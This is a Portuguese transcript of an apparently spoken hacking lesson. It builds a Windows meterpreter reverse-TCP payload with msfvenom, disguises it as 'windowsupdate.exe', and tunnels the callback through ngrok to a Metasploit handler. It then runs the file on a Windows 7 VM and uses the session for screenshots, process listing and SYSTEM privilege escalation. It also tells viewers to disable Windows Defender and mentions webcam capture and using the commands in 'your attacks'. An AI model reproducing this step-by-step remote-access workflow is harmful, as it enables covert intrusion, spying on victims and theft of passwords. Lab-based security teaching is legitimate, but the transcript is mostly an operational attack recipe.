fala pessoal nessa aula nós vamos falar sobre payload e também sobre maware diferente da aula anterior aqui nós vamos mexer com o cali Linux e criar um payload aí um arquivo malicioso via linha de comando tá através do Shell do Kali Linux Então bora pra minha tela aqui porque tem muito conteúdo pela frente e tá muito incrível vamos juntos aqui criar uma maware junto com payload aí e descobrir como são as suas funcionalidades O que que a gente consegue fazer tudo isso a linha de comando Bora lá e é claro antes de mais nada para nós falarmos a gente precisa entender o que é o conceito fundamento por trás para não sair apenas executando e fazendo um monte de coisa sem saber o que estamos fazendo Tá então vamos lá o que que é um payload tá o termo payload ele refere-se a uma carga útil ou um conjunto de instruções ali que o computador recebe tá que são entregues e executadas no sistema então importante lembrar nem todo payload é malicioso isso aqui é realmente muito importante porque quando a gente tá mexendo com segurança da informação a gente sim tá falando de um payload uma carga maliciosa uma carga útil ali uma instrução que vai às vezes né não é o melhor pro sistema a gente tá burlando o sistema mas só o termo payload não significa que ele é um algo malicioso a gente tá falando de uma carga de instruções um conjunto de instruções tá e a gente vai ver aqui alguns exemplos tá bem legais então payload é uma carga útil conjunto de instruções Por que que nem todo payload ele é malicioso vamos entender no desenvolvimento de software e aí Alguns programadores quem já programa Quem já tem aí um uma familiaridade com o desenvolvimento de software vai entender o que eu tô dizendo aqui se você não não tem familiaridade com desenvolvimento Não se preocupe você também vai entender porque a gente deixou de um jeito bem tranquilo de de se explicar tá no desenvolvimento de software na programação tá o termo payload ele é utilizado para se referir aos dados ou informações úteis que são transportados em uma comunicação ou transferência de dados Então quem tá desenvolvendo o software já ouviu várias vezes falar em payload E é claro que nem sempre vai ser malicioso não é algo ali que vai burlar o sistema tá então ele pode ser utilizado por exemplo para automatização de tarefas para transferência de dados pode ser utilizado aí para fins né porque como ele é uma carga útil ele é um conjunto de instruções você só insere Ele para Ele automatizar alguma tarefa então ele é muito sim muito utilizado para automatização de tarefas Tá agora quando a gente fala payload na segurança ofensiva no hacking Aí sim a gente tá falando de um conjunto de instruções né que a gente se refere a um código malicioso que é Entrega a um sistema alvo com obj de executar ações que são maliciosas obviamente porque o o computador meu computador por exemplo ele não foi feito para entregar informações para você ele foi feito para que eu consiga manipular informações para que eu dono do computador ou quem tiver utilizando use de maneira correta e não para ficar mandando informações que estão nele para outro lugar né Principalmente informações sensíveis a gente tá falando aqui de informações que são confidenciais n minhas fotos meus e-mails então tá nesse computador ela deve se manter nesse computador A não ser que eu queira por minha vontade não alguém Pegando sem eu saber então é um conjunto de instruções aí que vai fazer exatamente isso né pegar sem eu saber então aqui a gente tem alguns exemplos ó ele pode capturar teclas essa esse payload né ele pode ser feito aí para capturar webcam a webcam Ela tá aqui mas é para ser utilizada quando eu quiser que ela seja utilizada Quando eu for abrir uma miring uma reunião ou uma conversa e quiser que alguém me veja eu vou lá e abro não sem meu consentimento ele vai abre a a a câmera aqui webcam então Exatamente isso é o que o payload tá fazendo ele pode a qualquer momento Abrir a câmera e me ver tá então captura de informações confidenciais execução de ações maliciosas aí o payload tá ele pode executar depois que uma vez que ele tá dentro aqui do meu computador aí ele pode executar quase qualquer coisa que ele quiser tá tá agora se ele for Rot se ele for o administrador do sistema Aí sim ele pode fazer qualquer coisa que ele quiser tá a gente vai ver isso aí também na prática agora a gente vai ver e vai fazer tá um ataque com payload malicioso para isso nós vamos utilizar uma ferramenta do cali Linux tá no próprio cali Linux que se chama msf Venom já ouviu falar nessa ferramenta ela é Nativa do cali Linux tá e muitos Linux também tem se não tiver não tem problema assim que você tentar executar msf veno ele vai dizer que não tem para você instalar Daí você aperta ou Y de s ou S de sim tá mas se você já tem instalado o cali pode ser em máquina virtual pode ser em alguma outra forma pode ficar tranquilo que já vai ter naturalmente então o que que é o msf Venum tá é uma ferramenta tá do meta exploit Framework que ela é um gerador de payloads Sim a gente consegue gerar payloads para Android PR para Windows e a gente vai criar você vai ver e de formas personalizadas tá com qualquer nome que a gente quiser com qualquer tamanho que a gente quiser em qualquer pasta que a gente quiser então é bem personalizável e aí a gente com esse payload a gente consegue explorar vulnerabilidades em Sistemas tá aqui eu tô falando de criar um payload Então a gente vai criar um arquivo executável para que seja né obviamente executado E assim a gente ter mais informações mas tem um detalhe e um detalhe muito importante tá ele não é utilizado só para isso no exploit a gente consegue explorar vulnerabilidades sem a outra pessoa executar inclusive aí mais pra frente a gente pode dar uma olhada nisso também na criação de um payload tá a gente vai fazer isso agora na Prática eu sei que você tava ansioso para isso também estou ansioso para junto com você aí utilizar alguns comandos eu deixei até aqui um embaixo não se preocupe tá durante a aula aqui eu vou rodar alguns comandos mas aqui embaixo na descrição vão ter os mesmos comandos para que você possa copiar colar de maneira fácil até ficar gravado aí na sua mente você conseguir executar de maneira tranquila Beleza então para isso vamos lá a gente vai aqui já tá na parte final vamos lá agora aqui pro cali Linux Combinado então você vai abrir o cali Linux aí comigo eu vou abrir aqui cali Kali Já estou dentro do meu cali Linux Tá eu vou abrir aqui o Shell que é o meu terminalzinho aqui vou deixar ele até um pouco mais pro canto aqui para caso a gente comece a chegar aqui embaixo a minha imagem não fique na frente tá antes de mais nada nós vamos abrir isso é muito importante eu vou abrir como root aqui ó então o que que eu acabei de fazer tá eu olha só eu vi aqui em cima mudei PR ele tava aqui como vou até fazer de novo ele tá aqui se eu clicar no Shell você pode ver que ele tá preto ele vai abrir como se fosse um usuário comum do cali se eu vier aqui ó teral como Rot ele já vai pedir a senha e vai abrir como Rot tá eu poderia fazer dessa forma eu ia fazer dessa forma mas eu vou até fazer o seguinte ó sudu Pronto já sou Rot por que que eu vou virar Rot porque a gente vai utilizar o en grock agora atenção lembra que na aula anterior a gente utilizou Men grock no Windows só que a porta de comunicação na verdade o protocolo de comunicação que nós utilizamos foi o TCP que é pra comunicação né entre computador Então dessa forma a gente vai também aqui abrir uma porta chamada um protocolo TCP Tá então vamos lá nck TCP só que diferente da aula anterior que a gente utilizou 1337 agora nós vamos utilizar a 444 Por que 444 gente eu gosto de utilizar tá foi uma das primeiras formas que eu aprendi Ah então comecei a utilizar E desde lá então eu continuo utilizando a mesma porta tá mas fique à vontade aqui como eu já expliquei na aula anterior é uma porta apenas de comunicação Então a gente vai usar a 444 mas poderia ser 333 poderia ser 555 nada impediria tá poderia ser tranquilamente é costume mesmo tá então se você quiser me acompanhar Fique à vontade para digitar aí junto comigo na porta 444 o protocolo TCP Maravilha Já estamos com o nosso Enock rodando aqui ó beleza Ah que nós já havíamos configurado em outras Partes Tá mesma coisa a gente tem aqui a porta aqui na verdade a porta né a gente tem aqui o servidor que é o nosso Teoricamente é o IP o host name tá e o local host eu vou minizar porque por enquanto a gente não vai utilizar daqui a pouco a gente vai voltar aí naquela parte e agora gente nós vamos digitar o seguinte ó vou editar o sudo msf Venom aí esses comando vai est aqui embaixo por que que eu tô digitando sudo Porque eu quero rodar como Rot mas como aqui eu sou o cali não sou o rut eu jogo o sudo antes em vez de ter que fazer um sudo su entendeu então vamos lá msf Venom beleza menos P de plataform né de payload plataforma a plataforma que eu quero utilizar é a plataforma do Windows então eu vou digitar o Windows barra meterpreter barra reverse online e a gente Gente olha só que interessante também ó eu digito o comandinho começo dele dou um Tab E aí o que que acontece ele me completa tá então meterpreter Barra quando eu dito R se eu parei no v e eu dei um Tab ele já completou o resto reverse aí o underline a gente vai utilizar o TCP né Então bora lá trazer um pouquinho mais para cá agora a gente vai digitar em maiúsculo tá L port l p não L port é depois L host igual agora vai vir o seguinte a gente vai voltar aqui no nosso outro Shell na nossa nova nessa Instância aqui ó vamos copiar aqui ó vou copiar seleção Então tá vendo ó lembrando a partir do o do zero aqui né na verdade até o io Então é isso que eu vou fazer ó L host colar seleção Beleza então qual porta Vamos definir agora L port igual Ah vamos ver aqui já não lembro mais de cabeça a porta vai ser a 14 432 então copiar seleção no seu caso vai ser uma outra porta você copia aí tá vou colar então na porta então lport iG 14432 combinado espaço Format na verdade então a gente vai digitar o Men F é de Format menos f de deixa eu trazer mais para cá ó Enquanto Aqui tá em cima eu vou deixar assim tá eu não tô atrapalhando para ficar melhor para vocês visualizarem então sudo msf Venom menos P Windows bar meterpreter bar reverse online TCP L host igual a gente passou o nosso host name Espaço lport = 14 4432 os F continuando aqui f de Format que é o formato e vai ser um arquivo executável tá a gente vai rodar ele no Windows a gente já vai chegar lá menos o que é output esse o aqui é de output tá a saída dele onde eu quero que esse arquivo fique Então eu vou passar o caminho ó bar home barra cali Vou passar no usuário cali barra e agora a gente vai dar o nome tá então vamos dar o nome aqui vai se chamar Windows update PES Combinado então ó passei o caminho e aqui no final eu passo qual que é o arquivo que eu quero eu quero que eles se chame windowsupdate pz assim que eu dou um ent ele vai pedir a senha tranquilo porque eu tenho que ser Hot né vou jogar um cali vamos aguardar ele criar o nosso software né o nosso payload nosso arquivo executável né então ele não é um software ainda a não ser que eu juntasse ele com alguma coisa então maravilha ele terminou se você concluir aí com exito comigo ele vai mostrar aqui ó final size Qual que é o tamanho do arquivo final ele foi salvo aqui ó na pasta onde eu pedi ó home cali Windows update Então vamos ver se ele foi salvo mesmo vou dar um LS ó olha só que legal eu tenho aqui Windows update tá ponto e então é esse o executável que eu tenho eu tinha até criado um anterior ó uma atualização aí o nome gente à vontade tá engenharia social poderia se chamar jogo. nesse caso a gente jogou aqui Windows update tá agora que eu já ele que que eu vou fazer eu vou fazer o seguinte msf console então se você criou ele já vai tá na pasta como eu joguei na pasta home por isso que quando eu listei aqui ele tá aqui ó op ele tá aqui ó Windows update tá você dá um LS para ver se ele vai mostrar aí o arquivo executável abri o arquivo executável aí ele listou aí perfeito ele já tá criado Então vamos lá msf console [Música] para nós utilizarmos agora o Framework do meta exploit olha só que legal ele tá iniciando ó start meta exploit Framework console e é onde que aqui que a gente vai começar a rodar os comandos tá então agora eu trago para cá nessa parte aqui gente é muito interessante olha só a gente já tá dentro do meta exploit dentro desse meta exploit eu tenho 2000 exploits tá eu posso criar mais de 900 tipos de payloads tá é muito legal tem nove evasion aqui n Então vamos lá eu vou vamos dar continuidade aqui a gente já criou o nosso arquivo agora a gente precisa configurar a parte de comunicação desse arquivo com a minha máquina vamos lá e use mul barra handler isso aqui é tranquilo tá gente você vai fazer mesmo comando que eu tô rodando você vai rodar aí também vai dar certo use mut bar handler tá E aí ele vai mostrar aqui ó a gente vai configurar o payload tá é um Shell que a gente já configurou lá reverse mod Line TCP a gente já colocou umas configurações iniciais né uma porta ali um host mas a gente vai configurar agora a nossa máquina para receber essa Comunicação tá então multi barra handler Então vamos lá feito isso eu vou digitar o seguinte ó set payload a gente vai setar o nosso payload beleza não tô na frente maravilha então a gente vai digitar o seguinte ó Windows barra meterpreter barra reverse underline e a gente já passou por essa parte né reverse underline TCP então eu vou setar agora esse meu payload para Windows Beleza já estou nele aqui ó tô setando ele já me mostra o payload que eu vou setar Então vamos lá show options gente até aqui igual também tá você não vai mudar nada só rodar o comando show options olha só que interessante quando eu coloquei show options Ele me mostrou algumas coisas o meu host aqui ele não tá definido eu vou precisar definir tá e a minha porta tá errada errada não tá a gente tinha colocado essa porta não a gente tinha colocado 444 aqui tem um qu a mais Então a gente vai mudar isso aqui agora tá vamos lá set vamos lá L host nesse caso aqui eu já explico tá a gente vai digitar 0. 0.
0 p0 por qu porque o rost a gente não vai utilizar o meu IP aqui pessoal a gente nem nem local host a gente vai utilizar aquele host que a gente passou lá no nck lembra que a gente passou lá host a gente passou Dock para fazer o redirecionamento pra minha máquina Então vai ser o 0. 0. 0 tá pode colocar 0.
0. 0 mesmo aí tranquilo setei agora a gente vai definir a nossa porta tá então vamos lá set L port e agora sim o 444 e agora eu vou dar mais uma vez aqui ó Show options Beleza conseguimos mudar aquelas configurações lá ó então l rost Beleza local rost tranquilo agora a porta é importante porque a gente aqui no nosso n grock a gente aqui ó local host 444 tá vai ser essa porta aqui e agora gente eu vou eu posso já dar um exploit posso dar um Run aqui para rodar mas eu quero fazer algo com vocês aqui a gente já tem esse arquivo eu vou fazer o seguinte ó Python 3 Men M isso aqui a gente já viu na hoda de cali né como criar um servidor com python e eu vou passar aqui ó Python 3 - M http server na porta 8080 você já vai entender o porquê que a gente vai criar esse servidor aqui ó criei o servidor vou deixar ele rodando agora na minha outra máquina pessoal na no meu na minha outra máquina né Onde tá o meu Windows aqui eu vou abrir tá entendendo agora por que que eu tô fazendo isso gente porque eu tô usando uma máquina só mas esse arquivo aqui você pode enviar por e-mail para uma outra máquina você poderia tirar ele com pendrive levar para um outro sistema tá PR você rodar no outro sistema e ver o funcionamento dele ver a escuta dele aqui como a gente vai fazer mas você pode me copiar Aqui também tá eu gosto de fazer isso até porque ele é um executável e um executável a gente vai rodar ele no Windows Então como a gente já tem aqui Um Windows na minha máquina virtual Tá você também com certeza já vai ter você pode fazer o seguinte ó você vem aqui eu vou abrir a internet e a gente já viu essa parte de como criar né um servidor ali com Linux e tal eu vou pegar agora eu quero acessar essa minha máquina a gente já subiu um servidor em Python na porta 8080 vou jogar aqui ó if config eu tô nesse IP aqui ó eu vou copiar esse IP 200. 80 e aqui na minha Virtual Box 192.
68 p200 80 e vou aqui ó 8080 2is P 808 né porque é através da porta 8080 por termos já criado o servidor com python agora a gente consegue acesso à máquina certo e olha só que legal aqui embaixo eu vou até dar um zoom aqui para você ver ó aqui embaixo a gente tem ó windowsupdate olha quem tá aqui eu vou clicar para fazer o download aí eu já fiz o download ó cliquei porque é dessa forma eu consigo né pegar esse arquivo aqui dessa pra minha máquina entendeu por que a gente criou agora o servidor com python E aí na máquina do Windows eu só acessei através da porta isso porque eu tô em local host tá detalhe é importante você saber e as máquinas estão se comunicando se eu vier aqui ó CMD IP config olha só que legal essa máquina aqui é a 2. 79 e a máquina do cali é a 200. 80 Por que que isso acontece só culando porque todas elas são modo brid tá então se eu vier aqui nas configurações dela configurações de rede aqui ó rede configurações de rede todas elas ó placa em modo brid tá então para quem tem Windows ou quem tá utilizando Virtual Box lembra de sempre verificar se tá em modo Bridge para quem usa Mac OS se tiver utilizando outro sistema geralmente já é padrão o modo Bridge tá ele já se comunica entre si bem tranquilo agora se você tiver utilizando Virtual Box aí você consegue validar se tá em modo brid Então já baixei o software ele tá aqui ó já já a gente vai executar ele primeiro eu vou vir aqui no meu cali e vou digitar o seguinte ó vou fechar aqui ainda com o nosso mfs console aberto eu vou editar Run para rodar ó agora Ele já falou startou agora eu só tô esperando a comunicação já iniciamos o Run ele vai rodar aí o nosso payload PR escuta é a mesma coisa do casar lá se a gente tivesse clicado em start listening Então agora eu tô escutando qualquer pessoa que executar aquele arquivo eu vou ter acesso à máquina dela e já vai aparecer aqui para mim vamos ver voltando aqui no Virtual Box do Windows eu vou rodar ó cliquei aqui ele pergunta você tem certeza tenho ele tá você pode ver que o meu mouse ó ele tá como se tivesse rodando alguma coisa e olha que interessante ele não rodou nada porque a gente não configurou não juntou ele com arquivo nenhum ele só só executou aqui se eu vier aqui agora no meu cali olha só que interessante meter preter session 1 Open isso é muito incrível gente agora aqui eu já tenho acesso a um Shell da outra máquina como é que eu sei gente ele não tá mais escutando ó ele abriu uma conexão ó tá vendo aqui isso aqui mostra um opened se eu tivesse agora vamos lá Se eu tivesse cinco pessoas ao mesmo tempo tivesse aberto essa esse meu aplicativo tá esse meu software ele ia aparecer aqui session 1 session 2 session 3 ele ia aparecer cinco sessões tá E aí como é que eu alternaria entre elas ditando sessions traço I para mim conseguir para que eu consiga né passar uma entre uma sessão e outra tá nesse caso ele abriu uma sessão só e vamos ver agora o que que a gente consegue fazer tá aqui eu vou digitar o seguinte ó sisinfo para que eu possa pegar as informações do sistema então quando eu digitei cinfo Olha só quem eu sou agora eu sou o Cyber traço PC e eu não sou mais um cali eu não tô no cali aqui ó eu dei uma Qual que é a informação de sistema Eu sou Windows 7 Lembrando que essa informação tá em outros comandos que você pode rodar depois que você já tem uma Shell aberta que você tem uma conexão reversa aberta aí como a gente conseguiu aqui né vou a gente vai deixar aqui embaixo tá um documento com várias possibilidades para que você possa digitar sisinfo para pegar webcam também webcam underline Snap para pegar um screenshot da tela você vai ter todos esses comandos que você pode rodar tá e detalhe você também pode procurar né tutoriais aí afora mais informações Porque sempre vão surgindo novos comandos tá para escalar privilégios e tudo mais bom voltando aqui à aula agora eu sou o Cyber PC que se eu vier aqui ó na minha máquina virtual do Windows E aí se eu vier aqui no meu computador Olha só quem ele é Ó eu sou esse cara aqui ó Cyber PC e eu tenho as informações dele ó tá rodando no Windows set mas um detalhe importante eu quero até mostrar PR vocês vocês viram que eu baixei né a gente criou um server aqui no Python e eu fui lá baixei o arquivo e executei ele de boa executei ele tranquilamente porque o meu Ino ele tá tranquilo eu nunca mais fiz atualização n ele é Windows né Windows 7 um tanto quanto antigo mas se você tiver rodando aí Windows 10 Windows 11 Windows 7 mesmo mais com mais atualizações é possível tá vou adiantar que na hora que você for executar o arquivo ele não deixa ele barre Então como é que você resolve isso tá primeiro que é importante nessa máquina que não tem antivírus porque você pode utilizar o vírus Total tal e aqui você tá fazendo testes ou você pausa o antivírus né Na hora que você for executar o seu o próprio software malicioso antes que ele barre ou você pode fazer o seguinte ó que na verdade talvez você vai precisar fazer você vai vir e vai procurar aqui ó Windows defender E aí nesse caso esse aqui pode ver até que a tela é antiga né mas se eu vier aqui em ferramentas opções eu tenho aqui ó proteção em tempo real A minha tá desabilitada ó usar proteção em tempo real não quero eu quero que Rode tudo tranquilamente então ele você vê que eu rodo arquivos ele não faz validação se o seu for barrado se não for barrado maravilha você pode continuar executando aí a gente continua a aula aqui se for barrado Lembrando que às vezes pode ser que seja barrado você desativa o Windows defender dele tá então vol temos aqui a explicação agora eu já sou esse cara aqui ó eu sou o Cyber PC e que que eu posso rodar gente eu dei um cont control L para limpar gente agora as possibilidades são infinitas tá eu posso dar um ps ps eu vou ver tudo que tá são os processos né então ó vus pon e que eu já criei tá lá rodando ainda é Google Crash aud log a client aqui ó client.
on são todos os processos que estão rodando na máquina ó a o logon que a gente já logou o PS me dá todos os processos eu quero ver get e o ID quero ver quem eu sou né além do sinif eu só quero ver quem eu sou get eu sou Cyber PC usuário tá mais coisas eu se eu quisesse pegar webcam não dá tá porque não tem webcam ali na no minha máquina virtual mas eu rodaria o comando aqui webcam online Snap lá ó o alvo não tem webcam mas se eu desse webc Snap ele ia fazer o qu ele ia tirar uma foto rapidinho aqui da webcam ia salvar ali na área de trabalho tá na minha pasta tá vamos lá eu posso rodar screenshot Eu Posso rodar também ó eu quero pegar capturar a tela Inclusive eu vou vir aqui ó vamos supor que o usuário ele tá ali ó ele tá bem na hora que tá digitando a senha dele ó senha aula traço payload traço msf e colocar aqui ó site msf Venom um exemplo tá nessa tela e bem nessa hora eu quero ver o que que o usuário tá acontecendo ali que quero ver que que ele tá digitando Qual a tela que ele tá eu posso dar um screenshot ó assim que eu dou um screenshot olha só que legal ele salvou ele salvou um screenshot da tela do Meu Alvo em qual pasta em home cali aqui ó então se eu vier aqui na minha pasta ó vou aqui em Abrir pasta e eu se eu clicar aqui ó duas vezes ó olha só o print eu tenho o print aqui o screenshot né da tela ó que eu tô lá ó exatamente o que a gente táa editando a A paylo msf então salvou aqui para mim tá E e várias toda vez eu posso então colocar aqui para dar um screenshot e várias outras coisas se eu quisesse subir ou escalar privilégios escalar privilégios é o seguinte eu sou Se eu der um get you ID eu sou Cyber PC então eu sou usuário Cyber Tem coisa que eu consigo rodar a maioria delas mas tem coisa que eu não consigo fazer então eu posso dar um get System ó agora ele pegou através de uma técnica ele ele fez um impersonation né Ele tá se passando aqui pelo admin Vamos dar um get ID de novo agora eu sou a autoridade do sistema Você viu que a gente deu um get ID eu era o Cyber agora não agora a gente jogou um get System eu peguei o root do sistema e agora eu sou a autoridade máxima do sistema Ou seja eu posso remover arquivos eu posso ah inserir arquivos posso fazer o que eu quiser aquele o sistema não me barra mais porque eu sou o usuário autoridade combinado e vários outros comandos a gente vai deixar aí para você rodar tá bem tranquilo para que você possa utilizar aí nas aulas e até mesmo nos seus ataques pessoal mais uma coisa importante aqui que eu quero mostrar para vocês é que não sei se vocês repararam mas eu tô utilizando o meter preter e através do meter preter eu consigo dar um LS eu consigo utilizar comandos do próprio Linux para andar na máquina E ver tudo o que tem na máquina ali né então por exemplo eu dou um CD dois pontos eu volto a lá agora eu quero ir pro desktop de novo se eu der um LS Olha quem tá aqui ó o server o o server.